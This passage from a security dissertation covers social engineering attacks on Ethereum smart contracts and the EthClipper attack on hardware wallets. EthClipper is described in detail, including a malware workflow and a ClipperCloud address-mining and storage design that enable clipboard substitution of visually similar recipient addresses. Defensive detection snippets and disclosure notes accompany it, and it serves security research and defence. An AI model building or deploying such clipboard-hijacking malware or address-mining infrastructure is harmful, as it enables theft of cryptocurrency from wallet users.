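import unicodedata

# Code points that render as nothing in many editors (illustrative, not exhaustive).
INVISIBLE = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}

# Simplified pattern for double-quoted Solidity string literals (no escape handling).
STRING_LITERAL = re.compile(r'"([^"\n]*)"')


def suspicious_literals(source):
    """Return (line_number, code_points) for literals with invisible or non-ASCII symbols."""
    findings = []
    for line_number, line in enumerate(source.splitlines(), start=1):
        for match in STRING_LITERAL.finditer(line):
            odd = [ch for ch in match.group(1) if ch in INVISIBLE or ord(ch) > 127]
            if odd:
                names = [f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNNAMED')}" for ch in odd]
                findings.append((line_number, names))
    return findings


# The comparison from Fig. 2.13, once as deployed and once with a zero-width space.
clean = 'if (!compareStr(userGlobal.referrer, "")) {'
tampered = 'if (!compareStr(userGlobal.referrer, "\u200b")) {'

print(suspicious_literals(clean))
print(suspicious_literals(tampered))
```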
      Another interesting exploitable example of attack A4 can be found at
0xf5615138A7f2605e382375fa33Ab368661e017ff. This smart contract implements a personal smart contract
scheme, which implies that each user of the scheme has an individual deployment of the same smart contract,
sometimes referred to as a “wallet”. The contract uses a homograph symbol in a hashmap key,
which leads to the inability to withdraw previously deposited funds. Although the contract has
an obvious deception capability, neither the code nor the transaction log can definitively determine the
contract’s maliciousness. In other words, the homograph substitution of the map key may indicate
malice or a mere typo.
      Another peculiar example of a semantically exploitable Address Manipulation attack is the
game called JigsawGames224 . In this contract, the resolution function sellEggs contains a fee
transfer alongside the user reward transfer, which allows the attacker to block the user from
getting the prize by making the fee address non-payable via attack A1 or A2 techniques. The
contract does not implement any self-destruction or deprecation functionality, posing a challenge
for the attacker who needs to acquire the funds trapped in the contract. Coincidentally, this smart
contract also charges a developer fee in the engagement function buyEggs. In this case, the attacker
can create a fake player, and make the fee address payable by calling buyEggs function multiple
times using the fake player until the contract balance is drained through multiple fee transfers. This
example shows that smart contract owners often have multiple indirect ways of stealing funds from
smart contracts.
2.6.4: Observations
While performing a manual analysis of 3,855 suspected smart contracts, we gathered some interest-
ing observations, which are relevant within a broader discussion about social engineering attacks
   24
      Deployed at 0x2C7Bc39B1B0C9Fdf200fd30C74C0a9a41C2C7047.
    if (!compareStr(userGlobal.referrer, "")) {
        ...
        userRoundMapping[rid][referrerAddr].inviteAmount++;
    }
Figure 2.13: Empty string comparison in a smart contract. The contract is deployed at
0x61394198ee6cbe2d6ad603d52c10fba3237202ef.
in Ethereum.
Observation 1 [Multiple versions of the same code]: It is well-known that a vast majority of smart
contracts reuse secure patterns, modifiers, and abstract classes from the OpenZeppelin Contracts
library. However, despite the fact that we remove all duplicate smart contracts during the pre-
processing stage, our manual analysis of the suspected smart contracts reveals a significant number
of large contract clusters, in which a custom code is reused with slight modifications. Such clusters
of reused custom code patterns are also widely present in the semantically exploitable set, which
demonstrates that code reuse is prevalent in smart contracts, leading to the dissemination of insecure
patterns.
Observation 2 [No evidence of testnet experimentation with social engineering attacks]: In
pursuit of early signs of experimentation with social engineering attack patterns, we supplement our
dataset with open-source contracts from two testnets — Ropsten and Kovan. Our initial hypothesis
was that early experimental exploitations of social engineering attacks would appear on testnets first.
However, compared to Mainnet, in which 937 out of 3,165 suspected contracts are semantically
exploitable (29.6%), the share is 11.9% in Ropsten and 16.0% in Kovan. Thus, the testnets exhibit
a lower proportion of semantically exploitable social engineering contracts.
2.6.5: Survey of Auditing Firms
To further evaluate the proposed attacks, we send surveys consisting of two questions shown in
Fig. 2.14 to the following seven smart contract firms (listed alphabetically): Audithor, CertiK,
CoinFabrik, ConsenSys, Dedaub, Trail of Bits, and one company that elected to be anonymous.
The responses were provided by actual smart contract developers and security auditors from each
                           Table 2.3: Analysis results of 85,656 smart contracts.
                 Attack    Non-exploitable    Syntactically matching    Semantically exploitable
                 A1              561                   230                        636
                 A2              213                   100                        341
                 A3            1,515                     0                          0
                 A4               86                   123                         50
                 A5                0                     0                          0
                 A6                0                     0                          0
                 Total:        2,375                   453                      1,027
                             (a) Could this attack be dangerous to your customers?
                        (b) Do you think the attack can be discovered by human users?
Figure 2.14: Average survey results from seven smart contract auditing firms. The red vertical line
represents the average value of the six attacks.
of the firms (one anonymous participant from each company)25 . Fig. 2.14 represents the answers
from the experts regarding the six social engineering attacks. The vertical red lines represent the
averages of responses with respect to all the six attacks. The results of the survey demonstrate that
the experts agree that the social engineering attacks can cause damage to their customers. Also, the
experts believe that the social engineering attacks are unlikely to be discovered by a human user.
  25
     There was no identifiable private information collected from the anonymous participants; therefore, the study did
not require an IRB review.
2.7: Security Recommendations
In Section 2.6, we demonstrate that even if all the syntactic patterns in a smart contract correctly
match one of the social engineering attacks, only 1,027 contracts out of a total of 3,855 are actually
exploitable, which is less than 27%. Corroborating our finding, Zhou et al. [309] demonstrate that
the attempt to detect Ethereum honeypots by Torres et al. [270] in a fully-automated manner pro-
duces a large number of false negative and false positive results. Therefore, the defense against
social engineering attacks should involve human auditing. To account for this characteristic of
social engineering attacks, we develop a list of recommendations for people considering engage-
ment with a smart contract, including security auditors verifying safety of smart contracts on behalf
of their clients. These recommendations aim for effective identification and prevention of social
engineering attacks with minimal effort.
Recommendation 1 [Beware of address change]: To prevent A1, smart contract users should
not engage with a contract that allows changing the address of a transfer recipient within the
call stack of a critical operation. Our analysis finds many smart contracts with such patterns in the
wild, but none of them exhibits malicious intent or has a suspicious history. However, such a pattern
grants the owner a potential backdoor for blocking critical operations, e.g., fund withdrawals.
Recommendation 2 [Check EOAs for outgoing transactions]: To prevent A2 , smart contract
users should verify that all hard-coded EOAs have at least one outgoing transaction. If the EOA has
outgoing transactions (marked as “OUT” by Etherscan), it indicates that the smart contract owner
knows the private key of the EOA, and it entails that the owner does not know the private key of
the account that could deploy a smart contract at this address. In fact, the probability that someone
knows the private key of an EOA and the private key of the account for deploying a contract at the
same address equals the probability of a 160-bit hash collision because each public address is a
Keccak256 hash of a public key trimmed to 160 bits.
Recommendation 3 [Avoid visual cognitive bias]: To prevent A1 , smart contract users should
never compare addresses visually; the search function of a text editor should be used instead. In this work
we show that EIP-55 collision bruteforce attacks are easy to carry out. As a result, even slightly mod-
ified addresses with unknown associated private keys can be dangerous. Therefore, users should
treat all public addresses with suspicion.
Recommendation 4 [Avoid confirmation bias]: To prevent A3 , smart contract users should never
use accounts with all-lowercase EIP-55 checksums for smart contract testing. Most Ethereum
clients, such as Metamask, enforce EIP-55 checksums, so public addresses are always shown in
a mixed-capitalization form. Another way to verify an address is to paste it in the search field of
Etherscan, which also enforces EIP-55. If the address is all-lowercase, it might be a part of a social
engineering scheme, and thus the contract should undergo additional scrutiny.
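The all-lowercase check in Recommendation 4 is easy to automate. The sketch below is a hypothetical helper, not part of any wallet or of our tool. It only inspects letter case and does not compute the EIP-55 checksum itself, which would require a Keccak-256 implementation. The two sample addresses are taken from the footnotes of this chapter.

```python
import re

# 20-byte hexadecimal address literal.
ADDRESS = re.compile(r"\b0x[0-9a-fA-F]{40}\b")


def lacks_mixed_case(address):
    """Return True if the address contains hex letters but none of them is uppercase."""
    letters = [ch for ch in address[2:] if ch.isalpha()]
    return bool(letters) and all(ch.islower() for ch in letters)


def lowercase_addresses(source):
    """Return all address literals in the source that are written in all-lowercase form."""
    return [a for a in ADDRESS.findall(source) if lacks_mixed_case(a)]


sample = """
address a = 0x2C7Bc39B1B0C9Fdf200fd30C74C0a9a41C2C7047;
address b = 0x06012c8cf97bead5deae237070f9587f8e7a266d;
"""

print(lowercase_addresses(sample))
```

A flagged address is not necessarily malicious; it is only a prompt to display the address in its checksummed form and to examine the contract more closely.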
Recommendation 5 [Do not trust string comparison]: To prevent A4 , smart contract users
should not engage with a smart contract that uses string comparison to determine a transfer or
another critical operation. If a text comparison involves two immutable values, e.g., a constant and a
string literal, it is essentially a tautology, and is indicative of a derelict smart contract. However,
one way to carry out attack A4 is to mimic a tautology, as is shown in Fig. 2.5. Either way, a critical
operation determined by a string comparison should be treated with caution.
Recommendation 6 [Verify ICC selectors]: To prevent A5 and A6 , smart contract users should
verify the arguments of call() and delegatecall() with a hex viewer. Smart contract users and
auditors cannot see selectors associated with functions and arguments of call()/delegatecall()
while examining the Solidity code, since these selectors are computed at compile time. If the
parameters of call() or delegatecall() include a string literal, we recommend compiling both
the calling and the called contracts with the --asm or --ir options to verify that the selectors of
functions match. If the parameters are mutable variables, the contract cannot be treated as safe.
2.8: Chapter Summary
This work zeroes in on a largely overlooked class of social engineering attacks in Ethereum smart
contracts. These attacks exploit human cognitive biases as new attack vectors. We identified
these biases and developed six zero-day social engineering attacks. By embedding most of these
attacks into existing popular tokens, we demonstrated that the attacks have the potential to victimize a
large group of normal users. Moreover, the attacks remain dormant during testing and only activate
after a production deployment. We worked with seven smart contract security firms and confirmed
that the attacks are indeed dangerous and evasive. Our analysis reveals 1,027 existing smart con-
tracts that can potentially carry out social engineering attacks. By open-sourcing our analysis tools
and benchmark datasets, we invite further research exploration of this emerging topic.
CHAPTER 3: ATTACKING HARDWARE
WALLETS26
3.1: Introduction
Hardware crypto wallets, also known as cold wallets, are air-gapped devices that produce public-
key signatures27 for transactions with cryptocurrencies and smart contracts. These devices have
some computing power, but they have no networking interfaces, which keeps them outside of
cyberspace. Instead, they communicate with the client computer through a secure device-to-device
(D2D) channel (e.g., FIDO protocol over a USB serial bus). Hardware wallets are considered to
be the most secure solution for protecting crypto funds from theft, even when the
client computer is infected with malware. Fig. 3.1 shows four popular hardware wallets from three
leading brands available on the market: Trezor by SatoshiLabs s.r.o. [18], Ledger Nano X and
Ledger Nano S by Ledger SAS [17], and KeepKey by ShapeShift [19].
      Fig. 3.2 shows a transaction workflow with a hardware wallet. First, the client software prepares
a transaction message, and sends this message over to the hardware wallet via a non-networking
channel. Then, the user confirms the parameters of the transaction (such as transaction amount,
recipient address, and blockchain fee) shown on the display of the wallet. After that, the wallet
signs the transaction with a non-extractable private key, and sends the signature back to the client
software. Finally, the client software sends the signed transaction message to the blockchain, where
the transaction is executed. Unfortunately, the described chain of actions has a weak link: the
   26
      This chapter is based on previously published work by Nikolay Ivanov and Qiben Yan titled “Eth-
Clipper: A Clipboard Meddling Attack on Hardware Wallets with Address Verification Evasion” published
at the Proceedings of the 2021 IEEE Conference on Communications and Network Security (CNS). DOI:
10.1109/CNS53000.2021.9705033 [160]. © 2021 IEEE. Reprinted, with permission, from Nikolay Ivanov and Qiben
Yan, “EthClipper: A Clipboard Meddling Attack on Hardware Wallets with Address Verification Evasion” (paper and
IEEE titles are the same), October 2021.
   27
      All popular hardware crypto wallets are hierarchical deterministic (HD) wallets [16], which are capable of
generating a nearly infinite number of private keys (i.e., accounts) from a single secret seed.
Figure 3.1: Hardware wallets used in this research. ❶: Ledger Nano X; ❷: Trezor One; ❸: KeepKey;
❹: Ledger Nano S.
attacker does not need to compromise the wallet to steal funds — it is sufficient to tamper with the
transaction data sent for signing by falsifying the address of the recipient of funds. A recent
security analysis by Khan et al. [172] formally proves that under normal cryptographic assumptions,
the user of a hardware wallet plays a crucial role in its security. One way to target the user of a
hardware crypto wallet is to covertly substitute the transaction recipient address in
the clipboard of the operating system.
    The clipboard substitution attack, or clipboard hijacking, has been known for years [45, 67].
This attack exploits the fact that wallet users often use the clipboard for copying a recipient address
to the wallet’s client app. For example, the malware called Clipsa stole at least $36,000 worth of
Bitcoin in 2018 and 2019 [62]. By examining the client software provided by the three vendors of
the wallets shown in Fig. 3.1, we determined that they do not discourage the use of the clipboard
(e.g., by disabling the keyboard operations). In a clipboard substitution attack, the malware running
on the user’s computer detects the presence of a crypto address in the clipboard, and immediately
substitutes it with another address. This attack, however, has one major weakness: the user is
likely to notice the falsification of the address on the screen of the client software or on the mini-
screen of the hardware wallet. Hence, our research question: is it possible to devise a clipboard
Figure 3.2: General transaction workflow using a hardware wallet. ❶: The client software sends
the transaction data to the hardware wallet; ❷: the user verifies the data and confirms the transaction
with the wallet; ❸: the wallet sends the transaction signature back to the client software; ❹: the
client software sends the signed transaction to the blockchain network.
substitution attack that dodges the revelation of the address substitution during the transaction
confirmation phase?
    The major insight of this work is to incorporate a social engineering component into a clip-
board substitution attack. Social engineering attack techniques exploit human cognitive bias —
an optimization mechanism of the human mind that makes conclusions based on expectation, prior
experience, probability assessment, pre-existing belief, or emotions [145]. One way of exploiting a
cognitive bias is through visual deception, which is actively used by attackers in email phishing via
mimicking a popular website [285]. Another facet of cognitive bias is confirmation bias, defined
as the rejection of evidence contradicting the originally established belief [169]. We discover that
both the visual deception and confirmation bias could be exploited by an attacker who tries to steal
funds from the hardware wallet. Specifically, this work is inspired by our observation that hard-
ware wallet users exhibit a strong confirmation bias about the correctness of the recipient address,
resulting in a behavioral pattern of verifying only several leading (or trailing) digits of a transaction
address, or even skipping the verification altogether. The validity of this observation is confirmed
by previous research [50] and by manufacturers of the hardware wallets used in this research.
     In this work, we propose a new attack called EthClipper, which adds a social engineering com-
ponent to the existing clipboard substitution technique. In EthClipper, the attacker deploys a dis-
tributed system, called ClipperCloud, which is used to mine and store billions of Ethereum accounts.
When the malware detects an Ethereum address in the clipboard, it asks ClipperCloud to find among
the mined accounts the one that exhibits maximum visual similarity with the address in the clip-
board. As a result, the visual similarity between the address on the screen and the expected address
is likely to trigger the victim’s confirmation bias, leading to the approval of the malicious transaction.
Although the Clipsa malware [242] also attempts to match some symbols in the substituted address, it
uses a small address database and only targets two leading and two trailing symbols, which is very
easy to reveal visually. A small human-based study conducted by Almutairi and Al-Megren [50],
involving substitution of symbols in Bitcoin addresses using a KeepKey hardware wallet, confirms
that the rate of false approval of a modified address strongly correlates with the number of matching
symbols. Unsurprisingly, the attacks by Clipsa have been prevented at least 360,000 times [62].
Unlike Clipsa, EthClipper is highly optimized to enable practical substitution of up to 25% of the
symbols in the address to achieve a maximum level of deception on a limited attacker budget,
while maintaining low latency and maximizing the likelihood of having a replacement address readily
available.
     In summary, we deliver the following contributions:
     • We discover a new attack, called EthClipper, against hardware crypto wallets, which com-
        bines the features of clipboard substitution, cryptographic pre-computation, and social engi-
        neering to lure the victim into confirming a transaction with a tampered recipient address.
     • We introduce a low-latency application-specific distributed system, called ClipperCloud, that
        performs computation and storage needed for the EthClipper attack outside of the victim’s
        computer. This makes the attack a realistic one, which is easy to carry out.
     • We implement EthClipper malware, and test it using four popular hardware wallets from
        three manufacturers.
     • We implement the ClipperCloud system and test it on four server deployments. Our evaluation
       shows that ClipperCloud exhibits a low query latency, and the EthClipper attack adapts to
       a flexible range of setups and budgets.
     • For responsible disclosure, we have communicated the details of the attack to the manufacturers
       of the wallets used in this research and received confirmation from all of them that
       the attack is potentially dangerous.
Figure 3.3: Replacing 80% of address symbols with an ellipsis in MetaMask, one of the most
popular Ethereum wallets.
3.2: EthClipper Attack Design and Analysis
In this section, we elaborate on the technical details of the EthClipper attack, and then describe the
workings of the EthClipper malware, followed by elaboration on the ClipperCloud system needed
for the attack.
3.2.1: Attack Overview
The manufacturers of popular hardware crypto wallets openly state that hardware wallets are the
best devices for storing crypto accounts. Yet the EthClipper attack bypasses the air-gapped protec-
tion of hardware wallets in order to steal money from the user’s Ethereum account by falsifying
the transaction recipient address with an address belonging to the attacker. The EthClipper attack
uses the clipboard hijacking technique to falsify the data sent to a hardware wallet without com-
promising the wallet itself. However, unlike previous attacks of this kind, EthClipper makes it
harder for the user to recognize a falsification. Fig. 3.4 shows a general workflow of the attack.
The attacker infects the victim’s computer with malware using one of a plethora of available
techniques [88, 243]. The malware monitors the clipboard of the user account for the appearance of a valid
public crypto address. Once the address is discovered in the clipboard, the malware immediately
contacts the pre-deployed distributed system, called ClipperCloud, which stores a database of sim-
ilar addresses that have been mined in advance (see Section 3.2.3 for details). After receiving the
matching visually similar address from ClipperCloud, the malware replaces the original address in
the clipboard with the forged one.
     Our observation suggests that users of hardware wallets tend to verify a few leading and trailing
symbols in the address. Moreover, many popular Ethereum wallets, such as MetaMask, indirectly
suggest the normality of skipping the internal symbols of the address by incorporating this feature
in the user interface (see Fig. 3.3). This observation is independently confirmed by three
manufacturers of hardware wallets, and leads us to the design of the attack that substitutes the address
with one that matches ⌈N/2⌉ symbols in the prefix and ⌊N/2⌋ symbols in the suffix (see Fig. 3.6). Moreover,
our observation of Ethereum address checking by hardware wallet users reveals the habit of not
verifying more than 4 symbols in the prefix and 4 symbols in the suffix, suggesting that N = 8 is
likely to be a sufficient number of matching symbols in many cases. Since the attack is opportunistic,
there is no need for the attacker to succeed every time. However, the probability of success
grows with larger values of N. Furthermore, a large amount of funds involved in a
cryptocurrency transaction does not necessarily entail increased vigilance by the user. For example,
in 2016, an attack on an Ethereum smart contract, known as the DAO attack, incurred a damage
worth approximately $50 million due to a simple reentrancy vulnerability, which had been known
and well-researched for years prior to the attack [85] — despite high amounts of money at stake,
none of the investors in the infamous smart contract was able to notice the bug that was exploited
in the attack. Therefore, we do not exclude users of large transactions from the scope of potential
victims of EthClipper.
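
The ⌈N/2⌉ / ⌊N/2⌋ matching pattern described above can also be checked mechanically from the defender's side. The following is a minimal sketch, not part of the original study: the helper names (`shared_prefix_suffix`, `split_n`, `looks_deceptive`) are hypothetical, and the two sample addresses are invented filler strings rather than real accounts. It only counts how many leading and trailing hexadecimal symbols two addresses share.

```python
from typing import Tuple


def _normalize(addr: str) -> str:
    """Lower-case an address and drop an optional 0x prefix."""
    addr = addr.lower()
    return addr[2:] if addr.startswith("0x") else addr


def shared_prefix_suffix(a: str, b: str) -> Tuple[int, int]:
    """Count matching leading and trailing symbols of two addresses."""
    x, y = _normalize(a), _normalize(b)
    limit = min(len(x), len(y))
    prefix = 0
    while prefix < limit and x[prefix] == y[prefix]:
        prefix += 1
    suffix = 0
    # Do not let the suffix scan overlap the already-counted prefix.
    while suffix < limit - prefix and x[-1 - suffix] == y[-1 - suffix]:
        suffix += 1
    return prefix, suffix


def split_n(n: int) -> Tuple[int, int]:
    """Split N into ceil(N/2) prefix symbols and floor(N/2) suffix symbols."""
    return (n + 1) // 2, n // 2


def looks_deceptive(a: str, b: str, n: int = 8) -> bool:
    """True if two *different* addresses agree on the N-symbol pattern."""
    if _normalize(a) == _normalize(b):
        return False
    prefix, suffix = shared_prefix_suffix(a, b)
    need_prefix, need_suffix = split_n(n)
    return prefix >= need_prefix and suffix >= need_suffix


if __name__ == "__main__":
    # Invented 40-symbol strings that differ only in the middle.
    intended = "0x48b7" + "1" * 32 + "7696"
    pasted = "0x48b7" + "2" * 32 + "7696"
    print(shared_prefix_suffix(intended, pasted))
    print(looks_deceptive(intended, pasted, n=8))
```

A wallet client could, under these assumptions, use such a check to warn the user when a pasted address differs from a recently copied one while sharing its prefix and suffix.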
     When the user pastes the address into the hardware wallet’s client application, they have to
confirm the parameters of the transaction, including the recipient address, on the screen of the
wallet, as shown in Fig. 3.5. Since the address on the screen is visually similar to the expected one
(i.e., the two addresses have matching prefixes and suffixes), the victim might fail to notice the
substitution. Our informal communications with several users of hardware wallets confirm that most of
them, when verifying the recipient address, examine only the first and last several digits, or none
at all. Finally, the user pushes the confirmation button on the hardware wallet and sends the funds
to the address whose corresponding private key is stored on ClipperCloud, and is therefore known to
the attacker. EthClipper is optimized for the specifics of Ethereum, which allows the attacker
to maximize the social engineering effect of the attack, something that existing malware, such as
Clipsa, fails to achieve. However, it is possible to independently develop similar malware and an
associated distributed service optimized for other address formats, such as Bitcoin.
3.2.2: EthClipper Malware
In this research, we design malware that bypasses the air-gapped protection of a hardware
wallet through the EthClipper attack, which uses clipboard substitution as a carrier. The EthClipper
malware is a program that persistently runs in the background, monitoring the clipboard of the
current user. An important feature of the EthClipper malware is that it does not require any special
user privileges or hardware access. Moreover, it can be implemented as a cross-platform Python
or Node.js script. Once the malware detects an Ethereum address in the clipboard, it immediately
submits a UDP request to the ClipperCloud system, which replies with a substitute address, if one
is found. As soon as the substitute address is received, the malware injects it into the clipboard.
Intuitively, it is very important for the malware to substitute the address quickly, before the user
pastes the address into the wallet client application. The manufacturers of the hardware wallets used
in this study confirmed to us that there is currently no defense against the EthClipper attack. Thus,
given the decentralized nature of the Ethereum blockchain, if the attack is deployed and
subsequently revealed by one or multiple users, it would require extensive publicity and a substantial
amount of time to alert all potential victims of the attack. Next, we elaborate on the architecture of
ClipperCloud, which provides the storage model that achieves the low response latency needed to
ensure the success of the attack.
Figure 3.4: Workflow of the EthClipper attack. (1): The owner of the wallet copies a recipient
address to the clipboard from the source (e.g., website); (2): the EthClipper malware detects the
address in the clipboard; (3): the malware connects to ClipperCloud to request an address that is
similar to the one in the clipboard; (4): ClipperCloud replies with a similar address; (5): the
EthClipper malware places the substitute address from ClipperCloud in the clipboard; (6): the user of
the wallet pastes the address from the clipboard into the hardware wallet’s client software; (7): the
client software sends the transaction data, which includes the replaced (fake) recipient address, to
the hardware wallet for signing; (8): the hardware wallet asks the user to confirm the parameters of
the transaction (by pushing a button on the wallet); (9): the user of the hardware wallet, who is
prone to confirmation bias, confirms the transaction without verifying all of the symbols of the
recipient address; (10): the wallet signs the transaction using the air-gapped private key and sends
the signature to the wallet’s client software; (11): finally, the wallet client software sends the
signed transaction to the Ethereum blockchain, where the transaction is executed.
3.2.3: ClipperCloud
In order to make EthClipper practical for a real-world attacker, the abundant storage and heavy
computation needed for the attack must be outsourced to a distributed service. ClipperCloud is a
distributed system that has two main purposes: it mines malicious addresses for the attacker, and it
stores these addresses in a way that allows them to be queried very quickly. Next, we elaborate on
the architecture, computation, and storage model of ClipperCloud.
ClipperCloud Architecture: The EthClipper attack requires heavy computation (for mining
similar addresses), as well as large storage (for keeping the pre-mined addresses ready for the
malware and storing their corresponding private keys for the attacker to withdraw stolen money).
Moreover, to make ClipperCloud suitable for the EthClipper attack, the system must meet the
following four major requirements. First, regardless of the size of the database, the system must
respond to the malware requests very quickly, in order to replace the recipient address in the
clipboard before the user pastes it. Second, the computation and storage may need to be split between
multiple servers because a single server might not have sufficient resources required for the attack.
Third, the EthClipper malware is likely to have multiple instances, so the ClipperCloud system
must be able to serve them all. Fourth, the system must be flexible enough to support adding
additional computation and storage, as well as being easy to reconfigure after the address
database is fully mined. To satisfy these desiderata, we design ClipperCloud so that it can
split resources across multiple servers. To achieve that goal, each server performs communication
with the malware, computation, and storage in three parallel processes.

Figure 3.5: Ethereum cryptocurrency transaction confirmation in popular hardware wallets.
Panels: (a) KeepKey; (b) Ledger Nano S; (c) Ledger Nano X; (d) Trezor One.

Figure 3.6: Address substitution pattern. The substituted address has the same number of matching
prefix and suffix symbols (or one more in the prefix, when the number of symbols is odd), i.e.,
⌈N/2⌉ in the prefix $A_p$, ⌊N/2⌋ in the suffix $A_s$, N in total. When verifying the address, many
users check only a few symbols in the prefix, and sometimes a few symbols in the suffix.

    Fig. 3.7 shows the basic architecture of ClipperCloud. The distributed system can have one or
several servers. Each server has a compute module, which performs address mining, and a
storage module, which saves mined addresses along with their corresponding private keys. Each
server is responsible for storing addresses corresponding to a certain range of matching symbols,
while the compute module can produce addresses for any of the servers (because the result of the
random guessing is unpredictable). If the compute module on one server finds a matching address
for another server, it stores the result in a temporary buffer. When the buffer is full, the server
transfers these addresses over to the corresponding server; this procedure is called the cooperative
transfer. We conducted preliminary testing using a high-performance Microsoft Azure H-Series
server with 60 CPUs, which revealed that the cooperative transfer overhead was between 200 and
300 megabytes per minute, while the available bandwidth is normally 1 Gbps in the uplink direction
and 9 Gbps in the downlink direction, which confirms that there is no risk of a traffic bottleneck
incurred by the cooperative transfer. Also, we experimentally confirm that despite the increased
network traffic, the cooperative transfer delivers at least 50% faster database population compared
to discarding out-of-range addresses. We attribute this phenomenon to the servers’ use of direct
memory access (DMA) or similar hardware extensions, which allow disk operations to be performed
with minimal CPU involvement.
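
To make the bottleneck argument concrete, the reported overhead can be converted into a share of the uplink. This is a back-of-the-envelope sketch, assuming decimal megabytes (10^6 bytes) and a sustained transfer rate; the function name `transfer_share` is hypothetical.

```python
def transfer_share(mb_per_minute: float, link_gbps: float) -> float:
    """Fraction of a link consumed by a steady transfer.

    Assumes decimal units: 1 MB = 8e6 bits, 1 Gbps = 1e9 bits per second.
    """
    bits_per_second = mb_per_minute * 8e6 / 60
    return bits_per_second / (link_gbps * 1e9)


if __name__ == "__main__":
    for overhead in (200, 300):
        share = transfer_share(overhead, link_gbps=1.0)
        print(f"{overhead} MB/min uses {share:.1%} of a 1 Gbps uplink")
```

Under these assumptions, even the upper bound of 300 MB per minute corresponds to 40 Mbps, a small fraction of the 1 Gbps uplink.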
Compute Module and Address Mining: In order to conduct the EthClipper attack, the attacker
needs to have a large database of Ethereum accounts readily available for address substitution.
In this work, we call the process of populating such a database address mining, which is
performed by the ClipperCloud module called the address miner. The ClipperCloud address miner is
a multi-threaded program that generates random Ethereum accounts. For example, consider the
address substitution depicted in Fig. 3.6. The bottom address in this figure will be stored in the
slot $48B77696_{16}$ (or $1219982998_{10}$) within the ClipperCloud address space. Each address in the
ClipperCloud address space translates into an absolute address within one of the ClipperCloud
servers. The address miner, when a new account is created (see footnote 28), either forwards the
account to the storage module, or eventually sends this account to the ClipperCloud server where it
belongs (as part of the cooperative transfer). If there is already an account stored in that slot,
the new account is ignored.

Figure 3.7: ClipperCloud workflow.

Fixed-Field Storage: The account records produced by the address miner should be stored at
ClipperCloud in a way that any requested address substitute can be found very quickly; otherwise,
the malware will not be able to substitute the address in the victim’s clipboard within the short
period of time between copying and pasting of the address. To guarantee an instant response to a
record search, ClipperCloud stores records as hexadecimal strings in a fixed-field database, so its
total storage requirement $S_{tot}$ can be calculated as $S_{tot} = (S_{prk} + S_{pa}) \times 16^N$,
where $S_{prk}$ is the size of a private key, $S_{pa}$ is the size of a public address, and N is the
number of matching symbols (both prefix and suffix). Since EthClipper targets only Ethereum users,
$S_{prk}$ and $S_{pa}$ can be replaced with their respective numerical values of 64 and 40 bytes,
i.e., $S_{tot} = 104 \times 16^N$.

   28 By account we mean a pair made of a private key and the corresponding public address. In
      Ethereum, the address of an account is calculated as the rightmost 160 bits of the Keccak256
      hash of the account’s public key.

Figure 3.8: Overview of the ClipperCloud storage format.

      As shown in Fig. 3.8, the records in ClipperCloud are stored sequentially in fixed-size fields.
The length of one field is 104 bytes (a 40-byte address concatenated with a 64-byte private key). This
allows the records to be accessed in O(1) time. To access a record
within the file storage, the server needs to perform a single lseek (see footnote 29) operation
within the data file with the offset set to $104 \times ([A_p \,\|\, A_s] - a_0)$, where
$[A_p \,\|\, A_s]$ is the number resulting from the concatenation of the prefix $A_p$ and the suffix
$A_s$, and $a_0$ is the first value in the range of record numbers assigned to the current
ClipperCloud server. Additionally, ClipperCloud allocates storage
for cooperative transfer buffers, as well as a little space for logging successful requests (in order to
inform the attacker which accounts have stolen funds). Both of these additional storage components
remain constant and are much smaller than the storage of records when N is large, so we
exclude these insignificant values from the storage analysis.
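
The constant-time lookup described above is an instance of a generic fixed-width record file. The sketch below illustrates only the arithmetic and the single seek; it is not the authors' implementation. The names `slot_index`, `record_offset`, `read_record`, and `build_demo_file` are hypothetical, the demo file uses N = 2 for brevity, and each record holds a zero-padded slot number as placeholder content rather than any key material.

```python
import os
import tempfile

RECORD_SIZE = 104  # 40-byte address field + 64-byte key field, as hex strings


def slot_index(prefix_hex: str, suffix_hex: str) -> int:
    """Interpret the concatenation [A_p || A_s] as a hexadecimal number."""
    return int(prefix_hex + suffix_hex, 16)


def record_offset(slot: int, first_slot: int = 0) -> int:
    """Byte offset of a slot inside one server's data file."""
    return RECORD_SIZE * (slot - first_slot)


def total_storage_bytes(n_symbols: int) -> int:
    """S_tot = 104 * 16^N for N matching symbols."""
    return RECORD_SIZE * 16 ** n_symbols


def build_demo_file(n_symbols: int) -> str:
    """Write 16^N placeholder records and return the file path."""
    fd, path = tempfile.mkstemp(suffix=".dat")
    with os.fdopen(fd, "wb") as f:
        for slot in range(16 ** n_symbols):
            f.write(str(slot).zfill(RECORD_SIZE).encode("ascii"))
    return path


def read_record(path: str, slot: int, first_slot: int = 0) -> bytes:
    """Fetch one record with a single seek followed by a fixed-size read."""
    with open(path, "rb") as f:
        f.seek(record_offset(slot, first_slot))
        return f.read(RECORD_SIZE)


if __name__ == "__main__":
    print(slot_index("48B7", "7696"))   # slot of the Fig. 3.6 example
    print(total_storage_bytes(4))       # bytes needed for N = 4
    demo = build_demo_file(2)
    try:
        print(read_record(demo, slot_index("a", "f")))
    finally:
        os.remove(demo)
```

Because every record has the same length, the lookup cost does not depend on how many records the file holds, which is the property the storage model relies on.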
3.2.4: Address Mining Analysis
Each newly generated random address might match a previously stored ClipperCloud record.
Moreover, the more addresses ClipperCloud generates, the higher the probability of collision with an
already stored record, which slows down the rate of adding new records to the database of similar
addresses. Since the EthClipper attack is opportunistic by its nature, let us assume that 95% coverage
of available similar addresses is satisfactory for an attacker. In other words, we assume that the
ClipperCloud database is fully mined if any given address request has a 95% probability of
success. Here, we give a formal argument regarding the computational complexity of the brute-force
similar address mining that is probabilistically necessary for achieving the 95% target coverage.

   29 lseek is a system call in POSIX-compatible operating systems (e.g., Linux) that moves the
      read/write position (called offset) within a file. This operation is intended to have
      constant-time complexity.

Claim 1: A random set of 3 · M integer numbers from the interval [0, M − 1] is expected to have
at least 0.95 · M distinct values.
Proof: Let us consider a set S of properly random numbers $S_i \in \mathbb{Z}$, $0 \le S_i \le M - 1$,
with $|S| = 3M$. Each number in the set is expected to have a certain probability of collision with at
least one other number in the set, i.e.:
    $$p = \Pr(\exists i \in [1, 3M]\ \exists j \in [1, 3M] : i \ne j \wedge S_i = S_j) \tag{3.1}$$
The expected value of p is consistent with the well-known birthday paradox [171], in which the
expected proportion C of distinct values among m possible values in a random sample of
size n can be determined by the Taylor approximation shown below, which delivers a provably
narrow margin of error [247]:
    $$C = 1 - e^{-n/m} \tag{3.2}$$
Next, let us apply Eq. 3.2 to the constraints described in Eq. 3.1:
